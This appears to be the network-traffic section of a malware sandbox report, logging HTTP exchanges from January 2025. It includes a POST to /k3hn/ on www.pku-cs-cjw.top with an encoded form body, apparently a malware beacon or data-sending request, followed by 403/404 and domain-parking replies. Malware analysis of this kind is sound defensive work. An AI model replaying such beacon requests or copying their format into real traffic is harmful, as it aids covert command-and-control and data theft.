HTTP traffic detected: POST /k3hn/ HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 196Connection: closeOrigin: http://www.pku-cs-cjw.topReferer: http://www.pku-cs-cjw.top/k3hn/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)Data Raw: 72 56 75 34 53 78 46 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 52 30 46 6a 41 54 6c 41 48 62 70 32 2f 4b 4d 46 77 6b 65 69 64 51 79 4f 45 6d 55 6e Data Ascii: rVu4SxF=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5R0FjATlAHbp2/KMFwkeidQyOEmUn

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jan 2025 19:25:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54VorZ5JY1Gdh0UWRDompu09qwZpZJmOxY4DIMV7%2B%2Fz%2BDbKnoRdRfKR6zbfRfsihJtVJatTvL%2ByvFkRUndvAE0lhJFxceNUCdf43tsx8CMRv1qxROEKxxmPHXfNVICo7moj0lAv%2Bqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff0d867e7b159f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1824&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:25:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JiDEyStQ0FgCZ%2FyHDcQo2tRgXQgh7oxZ3bHKcx3AkgNxjjsR4uOALuRg9T5i%2FiXBgdkWzhU%2FxoVT0tAHEdnFBj%2Baswqfx4JlP%2Bjx8OGtqIj48I9lD7gdHxqdz4%2BHZg9qBfI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff0e3ff844335a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=2136&rtt_var=1068&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=716&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 d1 6b 22 31 10 c6 df 05 ff 87 a9 ef 3a bb de 4a 41 42 1e ae 2a 2d 78 3d a9 5b b8 7b 8c 66 34 a1 31 23 d9 59 97 fd ef 0f b7 6e 91 c2 bd e4 cb 64 e6 f7 31 e1 53 0f 8b df 4f e5 df cd 12 9e cb 5f 6b d8 bc ff 5c bf 3c c1 68 8c f8 b2 2c 57 88 8b 72 f1 d9 99 4e 32 c4 e5 eb 48 0f 07 ca c9 29 74 4a c6 6a 25 5e 02 e9 22 2b e0 95 05 56 5c 47 ab f0 f3 51 61 37 32 1c a8 1d db f6 aa 7b 8a 42 49 2b 97 7f 27 5c ae 15 de da c3 01 6c 39 a5 16 0e 9c 40 1c 81 8f 7b 8e 17 8a 9e e2 9e 26 6a 97 50 0f 07 9b 40 a6 22 48 74 e6 24 20 ce 57 70 a2 aa 32 47 02 13 ed 95 09 b5 a5 8e 3f 70 08 dc f8 78 04 1f 0f 9c 4e 46 3c 47 10 86 ba ea dd 4a 67 e2 07 b4 5c c3 85 52 0b a7 7a ef 1e 14 9e af 4b 8b d9 05 ea 2e a9 3b ad 7e 7f 5b cf 15 8a bd 95 4e e4 3c 47 6c 9a 66 62 ea aa bd 98 62 22 7c 46 13 1e 0b ec c7 f0 06 f7 16 5b 4a 17 4a f7 2e a1 66 eb 5b 1a 9b a6 1a 47 b6 94 ff 0f 5d 18 a1 7b 70 9a 4d 67 98 e5 98 e7 90 fd 98 4f 67 f3 59 f1 0d c5 af 2f b8 84 7a c3 0d 25 b2 b0 6b e1 8f 72 49 f7 a9 08 c5 a3 8f 74 17 83 c2 3e 38 bc 85 fe 0f b6 25 b0 6c 31 02 00 00 0d 0a Data Ascii: 164uk"1:JAB*-x=[{f41#Ynd1SO_k\<h,WrN2H)tJj%^"+V\GQa72{BI+'\l9@{&jP@"Ht$ Wp2G?pxNF<GJg\RzK.;~[N<Glfbb"\|F[JJ.f[G]{pMgOgY/z%krIt>8%l1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:25:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pizrS3w%2FJy8kDMUVJyUykuQ9LDpk3g8Zch4B3QDQ30D%2FV6z9A33e84yAJXiP9oNF23DAal1cXD0T%2BYeazCETdum4AGv9Y7P7nD4DYcxzCbKRhcOba05kyQTczNzzfP6AEmM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff0e4fdc3a7cac-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 6b 02 31 10 85 ef 82 ff 61 da bb ce ae 55 0a 12 72 68 b5 b4 60 5b a9 5b 68 8f d1 8c 26 34 66 24 3b eb b2 ff be b8 75 8b 14 7a c9 cb 64 e6 7b 4c 78 ea 6a f6 7a 5f 7c 2e e7 f0 58 3c 2f 60 f9 7e b7 78 ba 87 eb 01 e2 d3 bc 78 40 9c 15 b3 9f ce 68 98 21 ce 5f ae 75 bf a7 9c ec 43 ab 64 ac 56 e2 25 90 1e 67 63 78 61 81 07 ae a2 55 f8 f3 a8 b0 1d e9 f7 d4 9a 6d 73 d2 0d 45 a1 a4 95 cb ff 12 2e d7 0a cf ed 7e 0f 56 9c 52 03 5b 4e 20 8e c0 c7 0d c7 23 45 4f 71 43 43 b5 4e a8 fb bd 65 20 53 12 24 3a 70 12 10 e7 4b d8 53 59 9a 1d 81 89 f6 c4 84 ca 52 cb 6f 39 04 ae 7d dc 81 8f 5b 4e 7b 23 9e 23 08 43 55 76 6e 85 33 f1 0b 1a ae e0 48 a9 81 7d b5 71 57 0a 0f a7 a5 c5 ac 03 b5 97 d4 9e 56 bf bf 2d a6 0a c5 9e 4b 27 72 98 22 d6 75 3d 34 55 d9 1c cd 78 28 7c 40 13 6e c7 d8 8d e1 19 ee 2c 56 94 8e 94 2e 5d 42 c5 d6 37 34 30 75 39 88 6c 29 ff 0f 9d 19 a1 4b 70 94 8d 26 98 e5 98 e7 90 dd 4c 47 93 e9 e4 f6 0f 8a bf 5f 70 09 f5 92 6b 4a 64 61 dd c0 87 72 49 77 a9 08 c5 9d 8f 74 11 83 c2 2e 38 3c 87 fe 0d 76 7a c8 92 31 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 162uAk1aUrh`[[h&4f$;uzd{Lxjz_\|.X</`~xx@h!_uCdV%gcxaUmsE.~VR[N #EOqCCNe S$:pKSYRo9}[N{##CUvn3H}qWV-K'r"u=4Ux(\|@n,V.]B740u9l)Kp&LG_pkJdarIwt.8<vz10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:25:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GUOD0Teb%2ByEDmcxv7h8Gb7aUZGH9ZP4RjaHr%2BJsy%2F15ZnL4fJpnhVlPt6pprtU7BJc%2BHCKqRGsAgXKB7VyxTi8mlJxGevLCsa%2BhjiKaX6N19S5WxYb6foC9YlwxDa0jhhOA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff0e5fc8bf43ff-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1694&rtt_var=847&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1753&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb b5 45 2c 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7c 2e e7 f0 50 3c 2d 60 f9 7e bb 78 bc 83 cb 01 e2 e3 bc b8 47 9c 15 b3 9f ce 68 98 21 ce 9f 2f 75 bf a7 9c ec 42 ab 64 ac 56 e2 25 90 1e 67 63 78 66 81 7b ae a2 55 f8 f3 a8 b0 1d e9 f7 d4 8a 6d 73 d4 35 45 a1 a4 95 cb ff 12 2e d7 0a 4f ed 7e 0f de 38 a5 06 36 9c 40 1c 81 8f 6b 8e 07 8a 9e e2 9a 86 6a 95 50 f7 7b cb 40 a6 24 48 b4 e7 24 20 ce 97 b0 a3 b2 34 5b 02 13 ed 91 09 95 a5 96 df 70 08 5c fb b8 05 1f 37 9c 76 46 3c 47 10 86 aa ec dc 0a 67 e2 17 34 5c c1 81 52 03 bb 6a ed 2e 14 ee 8f 4b 8b 59 05 6a 2f a9 3d ad 7e 7f 5d 4c 15 8a 3d 95 4e 64 3f 45 ac eb 7a 68 aa b2 39 98 f1 50 78 8f 26 5c 8f b1 1b c3 13 dc 59 bc 51 3a 50 3a 77 09 15 5b df d0 c0 d4 e5 20 b2 a5 fc 3f 74 66 84 ce c1 51 36 9a 60 96 63 9e 43 76 35 1d 4d a6 93 9b 3f 28 fe 7e c1 25 d4 4b ae 29 91 85 55 03 1f ca 25 dd a5 22 14 b7 3e d2 59 0c 0a bb e0 f0 14 fa 37 4b 61 b4 c0 31 02 00 00 0d 0a Data Ascii: 162uAK1{;E,!mEj6&fJv{"xd{LxbrW\|.P<-`~xGh!/uBdV%gcxf{Ums5E.O~86@kjP{@$H$ 4[p\7vF<Gg4\Rj.KYj/=~]L=Nd?Ezh9Px&\YQ:P:w[ ?tfQ6`cCv5M?(~%K)U%">Y7Ka1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDeRSe7sd2%2Fd9Y5j0JCQVdyO%2BB0qKiGvHSpy79%2BSUKFxUP3s9FF5%2Fst0Pm%2FOaVbDjI7lEHaYWX6qavZZWId9iptpzITgMFBV54sPoVqedgLs0v8qpBqZp5ZWLFGx37v6f3Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff0e6fd8d880df-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=455&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 73 79 76 61 34 2e 74 6f 70 2f 61 6c 37 34 2f 3f 4a 58 59 68 3d 58 36 65 4c 38 56 70 30 26 61 6d 70 3b 72 56 75 34 53 78 46 3d 31 42 6a 73 65 34 61 61 75 43 6d 6f 39 37 4e 37 49 6a 4c 73 31 74 39 2f 35 44 79 74 56 2f 74 41 55 77 54 4a 55 36 75 36 45 2b 42 68 73 6f 66 36 55 48 78 64 79 32 52 71 62 79 52 67 74 62 74 37 67 4c 4b 50 67 68 55 38 6f 71 6e 72 34 6f Data Ascii: 2c0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:49 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ecf7-1a3"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:51 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:54 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e e5 9f 9f e5 90 8d e5 94 ae e5 8d 96 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 6e 61 6d 65 74 72 61 64 65 2f 64 6f 6d 61 69 6e 73 68 6f 77 3f 64 6f 6d 61 69 6e 3d 27 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 38 30 30 70 78 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 27 29 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<iframe src="https://wanwang.aliyun.com/nametrade/domainshow?domain='+window.location.hostname+'" style="width:100%;border:none;height:800px;"></iframe>')</script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:26:57 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ecf7-1a3"

